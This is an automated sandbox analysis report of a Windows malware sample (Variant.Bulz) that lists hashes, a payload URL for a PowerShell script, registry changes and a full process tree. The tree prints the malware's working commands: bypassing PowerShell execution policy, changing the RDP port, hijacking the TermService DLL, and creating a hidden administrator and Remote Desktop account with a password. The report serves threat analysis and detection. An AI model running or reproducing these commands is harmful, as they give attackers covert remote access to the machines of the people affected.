Analysis
-
max time kernel
40s -
max time network
150s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
06-03-2021 06:53
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Variant.Bulz.371365.8514.2555.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
SecuriteInfo.com.Variant.Bulz.371365.8514.2555.exe
Resource
win10v20201028
General
-
Target
SecuriteInfo.com.Variant.Bulz.371365.8514.2555.exe
-
Size
4.6MB
-
MD5
d6f9cf363d1cdbf8c076f9198e19df01
-
SHA1
b70fe14eef9aa33bd33068514e192f259802c5f1
-
SHA256
6f7c097945c1602bbae27e4664004cf2139e66226f54b9499df311bdab804ebb
-
SHA512
373962c1533835c6b490310a3a7ae99d6cca22359017499dc9c607a2a06c373a34b55d2ac472c85596f76ac233e87f530ff21cd2b80b916554fbbf6fb7cee1a7
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 16 4040 powershell.exe 18 4040 powershell.exe 19 4040 powershell.exe 20 4040 powershell.exe 22 4040 powershell.exe 24 4040 powershell.exe 26 4040 powershell.exe 28 4040 powershell.exe 30 4040 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 3920 3920 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_5mx5v14f.ovv.psm1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIECA8.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIED57.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIED26.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIED56.tmp powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_1u4v1pdn.amt.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIED36.tmp powershell.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4592 timeout.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 20 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 22 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 18 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 19 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2464 powershell.exe 2464 powershell.exe 2464 powershell.exe 1884 powershell.exe 1884 powershell.exe 1884 powershell.exe 3916 powershell.exe 3916 powershell.exe 3916 powershell.exe 4432 powershell.exe 4432 powershell.exe 4432 powershell.exe 2464 powershell.exe 2464 powershell.exe 2464 powershell.exe 4040 powershell.exe 4040 powershell.exe 4040 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 612 612 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2464 powershell.exe Token: SeDebugPrivilege 1884 powershell.exe Token: SeIncreaseQuotaPrivilege 1884 powershell.exe Token: SeSecurityPrivilege 1884 powershell.exe Token: SeTakeOwnershipPrivilege 1884 powershell.exe Token: SeLoadDriverPrivilege 1884 powershell.exe Token: SeSystemProfilePrivilege 1884 powershell.exe Token: SeSystemtimePrivilege 1884 powershell.exe Token: SeProfSingleProcessPrivilege 1884 powershell.exe Token: SeIncBasePriorityPrivilege 1884 powershell.exe Token: SeCreatePagefilePrivilege 1884 powershell.exe Token: SeBackupPrivilege 1884 powershell.exe Token: SeRestorePrivilege 1884 powershell.exe Token: SeShutdownPrivilege 1884 powershell.exe Token: SeDebugPrivilege 1884 powershell.exe Token: SeSystemEnvironmentPrivilege 1884 powershell.exe Token: SeRemoteShutdownPrivilege 1884 powershell.exe Token: SeUndockPrivilege 1884 powershell.exe Token: SeManageVolumePrivilege 1884 powershell.exe Token: 33 1884 powershell.exe Token: 34 1884 powershell.exe Token: 35 1884 powershell.exe Token: 36 1884 powershell.exe Token: SeDebugPrivilege 3916 powershell.exe Token: SeIncreaseQuotaPrivilege 3916 powershell.exe Token: SeSecurityPrivilege 3916 powershell.exe Token: SeTakeOwnershipPrivilege 3916 powershell.exe Token: SeLoadDriverPrivilege 3916 powershell.exe Token: SeSystemProfilePrivilege 3916 powershell.exe Token: SeSystemtimePrivilege 3916 powershell.exe Token: SeProfSingleProcessPrivilege 3916 powershell.exe Token: SeIncBasePriorityPrivilege 3916 powershell.exe Token: SeCreatePagefilePrivilege 3916 powershell.exe Token: SeBackupPrivilege 3916 powershell.exe Token: SeRestorePrivilege 3916 powershell.exe Token: SeShutdownPrivilege 3916 powershell.exe Token: SeDebugPrivilege 3916 powershell.exe Token: SeSystemEnvironmentPrivilege 3916 powershell.exe Token: SeRemoteShutdownPrivilege 3916 powershell.exe Token: SeUndockPrivilege 3916 powershell.exe Token: SeManageVolumePrivilege 3916 powershell.exe Token: 33 3916 powershell.exe Token: 34 3916 powershell.exe Token: 35 3916 powershell.exe Token: 36 3916 powershell.exe Token: SeDebugPrivilege 4432 powershell.exe Token: SeIncreaseQuotaPrivilege 4432 powershell.exe Token: SeSecurityPrivilege 4432 powershell.exe Token: SeTakeOwnershipPrivilege 4432 powershell.exe Token: SeLoadDriverPrivilege 4432 powershell.exe Token: SeSystemProfilePrivilege 4432 powershell.exe Token: SeSystemtimePrivilege 4432 powershell.exe Token: SeProfSingleProcessPrivilege 4432 powershell.exe Token: SeIncBasePriorityPrivilege 4432 powershell.exe Token: SeCreatePagefilePrivilege 4432 powershell.exe Token: SeBackupPrivilege 4432 powershell.exe Token: SeRestorePrivilege 4432 powershell.exe Token: SeShutdownPrivilege 4432 powershell.exe Token: SeDebugPrivilege 4432 powershell.exe Token: SeSystemEnvironmentPrivilege 4432 powershell.exe Token: SeRemoteShutdownPrivilege 4432 powershell.exe Token: SeUndockPrivilege 4432 powershell.exe Token: SeManageVolumePrivilege 4432 powershell.exe Token: 33 4432 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
SecuriteInfo.com.Variant.Bulz.371365.8514.2555.exepowershell.execsc.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 4688 wrote to memory of 2464 4688 SecuriteInfo.com.Variant.Bulz.371365.8514.2555.exe powershell.exe PID 4688 wrote to memory of 2464 4688 SecuriteInfo.com.Variant.Bulz.371365.8514.2555.exe powershell.exe PID 2464 wrote to memory of 796 2464 powershell.exe csc.exe PID 2464 wrote to memory of 796 2464 powershell.exe csc.exe PID 796 wrote to memory of 364 796 csc.exe cvtres.exe PID 796 wrote to memory of 364 796 csc.exe cvtres.exe PID 2464 wrote to memory of 1236 2464 powershell.exe csc.exe PID 2464 wrote to memory of 1236 2464 powershell.exe csc.exe PID 1236 wrote to memory of 1312 1236 csc.exe cvtres.exe PID 1236 wrote to memory of 1312 1236 csc.exe cvtres.exe PID 2464 wrote to memory of 1884 2464 powershell.exe powershell.exe PID 2464 wrote to memory of 1884 2464 powershell.exe powershell.exe PID 2464 wrote to memory of 3916 2464 powershell.exe powershell.exe PID 2464 wrote to memory of 3916 2464 powershell.exe powershell.exe PID 2464 wrote to memory of 4432 2464 powershell.exe powershell.exe PID 2464 wrote to memory of 4432 2464 powershell.exe powershell.exe PID 2464 wrote to memory of 4200 2464 powershell.exe reg.exe PID 2464 wrote to memory of 4200 2464 powershell.exe reg.exe PID 2464 wrote to memory of 4620 2464 powershell.exe reg.exe PID 2464 wrote to memory of 4620 2464 powershell.exe reg.exe PID 2464 wrote to memory of 1180 2464 powershell.exe reg.exe PID 2464 wrote to memory of 1180 2464 powershell.exe reg.exe PID 2464 wrote to memory of 4400 2464 powershell.exe net.exe PID 2464 wrote to memory of 4400 2464 powershell.exe net.exe PID 4400 wrote to memory of 4568 4400 net.exe net1.exe PID 4400 wrote to memory of 4568 4400 net.exe net1.exe PID 2464 wrote to memory of 2932 2464 powershell.exe cmd.exe PID 2464 wrote to memory of 2932 2464 powershell.exe cmd.exe PID 2932 wrote to memory of 2260 2932 cmd.exe cmd.exe PID 2932 wrote to memory of 2260 2932 cmd.exe cmd.exe PID 2260 wrote to memory of 984 2260 cmd.exe net.exe PID 2260 wrote to memory of 984 2260 cmd.exe net.exe PID 984 wrote to memory of 4596 984 net.exe net1.exe PID 984 wrote to memory of 4596 984 net.exe net1.exe PID 2464 wrote to memory of 4256 2464 powershell.exe cmd.exe PID 2464 wrote to memory of 4256 2464 powershell.exe cmd.exe PID 4256 wrote to memory of 1352 4256 cmd.exe cmd.exe PID 4256 wrote to memory of 1352 4256 cmd.exe cmd.exe PID 1352 wrote to memory of 2164 1352 cmd.exe net.exe PID 1352 wrote to memory of 2164 1352 cmd.exe net.exe PID 2164 wrote to memory of 2052 2164 net.exe net1.exe PID 2164 wrote to memory of 2052 2164 net.exe net1.exe PID 3464 wrote to memory of 3588 3464 cmd.exe net.exe PID 3464 wrote to memory of 3588 3464 cmd.exe net.exe PID 3588 wrote to memory of 4144 3588 net.exe net1.exe PID 3588 wrote to memory of 4144 3588 net.exe net1.exe PID 416 wrote to memory of 3156 416 cmd.exe net.exe PID 416 wrote to memory of 3156 416 cmd.exe net.exe PID 3156 wrote to memory of 3428 3156 net.exe net1.exe PID 3156 wrote to memory of 3428 3156 net.exe net1.exe PID 3832 wrote to memory of 3424 3832 cmd.exe net.exe PID 3832 wrote to memory of 3424 3832 cmd.exe net.exe PID 3424 wrote to memory of 2264 3424 net.exe net1.exe PID 3424 wrote to memory of 2264 3424 net.exe net1.exe PID 4852 wrote to memory of 796 4852 cmd.exe net.exe PID 4852 wrote to memory of 796 4852 cmd.exe net.exe PID 796 wrote to memory of 1120 796 net.exe net1.exe PID 796 wrote to memory of 1120 796 net.exe net1.exe PID 2080 wrote to memory of 1412 2080 cmd.exe net.exe PID 2080 wrote to memory of 1412 2080 cmd.exe net.exe PID 1412 wrote to memory of 1264 1412 net.exe net1.exe PID 1412 wrote to memory of 1264 1412 net.exe net1.exe PID 1556 wrote to memory of 1560 1556 cmd.exe net.exe PID 1556 wrote to memory of 1560 1556 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Bulz.371365.8514.2555.exe"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Bulz.371365.8514.2555.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mtv2wuy1\mtv2wuy1.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES84D5.tmp" "c:\Users\Admin\AppData\Local\Temp\mtv2wuy1\CSC6C4D9FC6F68E48DCBD114890A44A2246.TMP"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zowv1r1s\zowv1r1s.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES87C3.tmp" "c:\Users\Admin\AppData\Local\Temp\zowv1r1s\CSCC53057A6C714A0B9B24DD4662F9C538.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C timeout -n t& del C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Bulz.371365.8514.2555.exe2⤵
-
C:\Windows\system32\timeout.exetimeout -n t3⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc jODpYwzb /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc jODpYwzb /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc jODpYwzb /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc jODpYwzb1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc jODpYwzb2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc jODpYwzb3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
-
